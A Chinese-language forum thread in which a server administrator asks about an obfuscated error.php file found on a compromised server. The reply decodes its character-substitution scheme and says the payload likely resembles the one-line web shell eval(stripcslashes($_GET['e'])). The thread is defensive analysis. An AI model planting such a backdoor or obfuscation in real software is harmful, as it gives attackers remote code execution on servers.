突然伺服器監控到非常慢的執行檔案
然後找到了一個名字叫 error.php 的檔案,我雖然刪除了,但是還很不放心,可以幫我看看裡面是什麼內容嗎?或者有什麼方法可以看到嗎?類似 base64_decode 之類的加密?
http://runjs.cn/detail/t7pjk2ps
點擊查看源碼幫我查看下 拜託各位。
回複內容:
突然伺服器監控到非常慢的執行檔案
然後找到了一個名字叫 error.php 的檔案,我雖然刪除了,但是還很不放心,可以幫我看看裡面是什麼內容嗎?或者有什麼方法可以看到嗎?類似 base64_decode 之類的加密?
http://runjs.cn/detail/t7pjk2ps
點擊查看源碼幫我查看下 拜託各位。
簡單的替換字串,密碼錶就是上面的'f', '0'=>'w', '3'=>'7', '2'=>'n', '5'=>'g', '4'=>'D', '7'=>'A', '6'=>'5', '9'=>'J', '8'=>'T', 'A'=>'t', 'C'=>'N', 'B'=>'H', 'E'=>'2', 'D'=>'O', 'G'=>'z', 'F'=>'9', 'I'=>'s', 'H'=>'a', 'K'=>'i', 'J'=>'p', 'M'=>'G', 'L'=>'0', 'O'=>'P', 'N'=>'e', 'Q'=>'v', 'P'=>'Q', 'S'=>'4', 'R'=>'K', 'U'=>'U', 'T'=>'L', 'W'=>'h', 'V'=>'S', 'Y'=>'y', 'X'=>'C', 'Z'=>'V', 'a'=>'b', 'c'=>'x', 'b'=>'R', 'e'=>'l', 'd'=>'r', 'g'=>'j', 'f'=>'o', 'i'=>'Y', 'h'=>'M', 'k'=>'8', 'j'=>'E', 'm'=>'I', 'l'=>'c', 'o'=>'3', 'n'=>'u', 'q'=>'Z', 'p'=>'F', 's'=>'q', 'r'=>'W', 'u'=>'B', 't'=>'m', 'w'=>'X', 'v'=>'k', 'y'=>'1', 'x'=>'6', 'z'=>'d'
執行函數 eval/wkptvfa/(nkvtfik($wlxyoibj, $genueofqx))
/如果沒有猜錯,應該是訪問某個網址。/
如果很耗cpu,解密後應該類似這個函數
eval(stripcslashes($_GET['e']));
轉碼的話就是base64_decode()